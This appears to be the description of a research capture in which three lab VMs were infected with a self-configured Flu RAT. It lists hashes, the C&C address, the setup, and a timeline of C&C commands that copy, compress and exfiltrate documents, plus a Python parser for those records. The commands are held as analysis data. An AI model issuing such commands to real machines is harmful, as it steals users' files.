Description
- Name: Flu Malware
- Flu is a real RAT malware that was developed without the intention of abusing it. The Flu project group created a real and completely functional RAT with the aim of learning and testing ideas. It is free to download.
- The infection was done on three home computers with our own configured version of flu malware with an online C&C.
- The three computers were VirtualBox VMs running Windows 7 Tiny.
- The VMs were configured to use a Squid proxy (versions 2.7 and 3.3.7) running in another Linux VM to communicate with the Internet.
- We set up our own C&C server on openshift.com (PHP+MySQL+PHPMyAdmin)
- The custom binary used was:
- flufollower-bot.exe (flufollower-0.5.2a)
- MD5: 0858d8f8b06af40c9738003044a8cf0e
- SHA1: 044ae35e7e00de1f4ffaeee54c2943047bfacb13
- SHA256: 5497fa425b006a8ec368f273159ed060c50fae4bf4cdb5a70cf3fdf51e7e01f9
- Duration: 5.6 days
- Addresses Used in the capture:
- C&C server in openshift
- 54.242.92.108, port 80. Domain: twit-myconnection.rhcloud.com
- Bot 1
- Bot 2
- Bot 3
- Proxy Server
- VirusTotal
- HybridAnalysis
- RobotHash

About the configuration of Flu
- Pooling of 10 seconds
- Stealth control behavior: commands every 30mins and 8 hours
- HTTP C&C through a proxy
- Behavior of the attacks: search files, compress them, exfiltrate
- Data sent using the C&C channel.
- The flu malware was configured to our needs.
Topology
- 3 VirtualBox Windows 7, bridged and configured with a proxy on Windows
- The Squid proxy is running in another VM on Linux, Squid 2.7 first and 3.3.7 later on (the first version didn't work well)
- The malware communicates through the proxy to the C&C on openshift.com, where we used a PHP webserver, a MySQL database and PHPMyAdmin for administration.
Management traffic
We did several SSH connections to openshift for management purposes. They are not part of the infection.
Timeline (Unfortunately the timeline here is not comprehensive. For a comprehensive list of commands and times see the file timeline.of.commands.txt)
Mon, 08 Jul 2013 23:00:00 GMT
Start of the capture - During the first day, we only did the infection and the C&C connections.
Tue, 09 Jul 2013 18:32:51
Changed the proxy to squid/3.3.7, because the other one was not allowing us to exfiltrate
Wed, 10 Jul 2013 01:26:05 GMT
Command 30958 sent.
Wed, 10 Jul 2013 12:28:23 GMT
Some copy of documents to a local folder
<instruction type="cp" argumento="C:\Users\Administrator\Documents\*.ppt C:\test\" id_unico_comando="24205" maquina="administrator_0800272508E5"/>
Wed, 10 Jul 2013 15:14:17 GMT
Compression of documents
<instruction type="Rar.exe" argumento="a C:\A1234567890.rar C:\Users\Administrator\Documents\*.pdf" id_unico_comando="8544" maquina="administrator_0800273C8DC9"/>
Wed, 10 Jul 2013 16:35:20 GMT
Exfiltration of documents
<instruction type="getfile" argumento="C:\A1234567890.rar" id_unico_comando="30596" maquina="administrator_0800272508E5"/>
Wed, 10 Jul 2013 23:26:41 GMT
More exfiltration of documents
<instruction type="getfile" argumento="C:\A001.rar" id_unico_comando="9501" maquina="administrator_0800272508E5"/>
Wed, 10 Jul 2013 23:31:11 GMT
Command to compress documents
<instruction type="Rar.exe" argumento="a C:\A123.rar C:\Users\Administrator\Documents\*.docx" id_unico_comando="277" maquina="administrator_0800273C8DC9"/>
Wed, 10 Jul 2013 23:41:01 GMT
Exfiltration of documents
<instruction type="getfile" argumento="C:\A123.rar" id_unico_comando="2054" maquina="administrator_0800273C8DC9"/>
Thu, 11 Jul 2013 10:42:08 GMT
Command to shut down one bot
<instruction type="shutdown" argumento="-r " id_unico_comando="20258" maquina="administrator_08002785477E"/>
Thu, 11 Jul 2013 13:03:41 GMT
Command to shut down another bot
<instruction type="shutdown" argumento="-r" id_unico_comando="14756" maquina="administrator_0800273C8DC9"/>
Thu, 11 Jul 2013 13:07:55 GMT
Command to list files in all bots
<instruction type="listfiles" argumento="" id_unico_comando="25144" maquina="all"/>
Fri, 12 Jul 2013 22:27:22 GMT
Command 27269 sent (snapshot on all bots).
<instruction type="snapshot" argumento="" id_unico_comando="27269" maquina="all"/>
Sun, 14 Jul 2013 13:28:43 GMT
Capture finished
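As an added example (not part of the capture files or of the Flu project), the following Python parses the instruction records quoted in the timeline above and pairs, per bot, each Rar.exe compression with the getfile that pulled the resulting archive, so the "search files, compress them, exfiltrate" behaviour described in the configuration section can be checked against the C&C records. The instruction records are copied from this page; the pairing logic and the "unstaged exfiltration" label are assumptions of this example.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed sample input: the Flu C&C instruction records quoted in the timeline
# above. Attribute names (type, argumento, id_unico_comando, maquina) are those of
# the Flu instruction format shown on this page.
SAMPLE_INSTRUCTIONS = [
    r'<instruction type="cp" argumento="C:\Users\Administrator\Documents\*.ppt C:\test\" id_unico_comando="24205" maquina="administrator_0800272508E5"/>',
    r'<instruction type="Rar.exe" argumento="a C:\A1234567890.rar C:\Users\Administrator\Documents\*.pdf" id_unico_comando="8544" maquina="administrator_0800273C8DC9"/>',
    r'<instruction type="getfile" argumento="C:\A1234567890.rar" id_unico_comando="30596" maquina="administrator_0800272508E5"/>',
    r'<instruction type="getfile" argumento="C:\A001.rar" id_unico_comando="9501" maquina="administrator_0800272508E5"/>',
    r'<instruction type="Rar.exe" argumento="a C:\A123.rar C:\Users\Administrator\Documents\*.docx" id_unico_comando="277" maquina="administrator_0800273C8DC9"/>',
    r'<instruction type="getfile" argumento="C:\A123.rar" id_unico_comando="2054" maquina="administrator_0800273C8DC9"/>',
    r'<instruction type="listfiles" argumento="" id_unico_comando="25144" maquina="all"/>',
]

def parse_instruction(xml_text):
    """Parse one <instruction .../> record into (type, arguments, command id, bot)."""
    el = ET.fromstring(xml_text)
    if el.tag != "instruction":
        raise ValueError("not a Flu instruction record")
    return el.get("type"), el.get("argumento", ""), el.get("id_unico_comando"), el.get("maquina")

def archive_path(cmd_type, args):
    """Archive named by a compress (Rar.exe 'a <archive> <sources>') or an
    exfiltrate (getfile <path>) command; None for every other command type."""
    if cmd_type == "Rar.exe":
        parts = args.split()
        return parts[1].lower() if len(parts) >= 2 and parts[0] == "a" else None
    if cmd_type == "getfile":
        return args.strip().lower() or None
    return None

def exfil_report(xml_records):
    """Per bot, match archives built by Rar.exe with archives pulled by getfile.
    Same-bot matches are complete compress-then-exfiltrate chains; a getfile with
    no matching Rar.exe on that bot is reported as an unstaged exfiltration."""
    built, pulled = defaultdict(set), defaultdict(set)
    for text in xml_records:
        cmd_type, args, _cmd_id, bot = parse_instruction(text)
        arc = archive_path(cmd_type, args)
        if arc is not None:
            (built if cmd_type == "Rar.exe" else pulled)[bot].add(arc)
    chains = sorted((b, a) for b in pulled for a in pulled[b] & built[b])
    orphans = sorted((b, a) for b in pulled for a in pulled[b] - built[b])
    return {"complete_chains": chains, "unstaged_exfiltrations": orphans}

if __name__ == "__main__":
    for label, items in exfil_report(SAMPLE_INSTRUCTIONS).items():
        print(label, items)
```

On the records above this pairs A123.rar on bot administrator_0800273C8DC9 as a complete chain, while the two archives pulled from administrator_0800272508E5 have no Rar.exe command recorded for that bot.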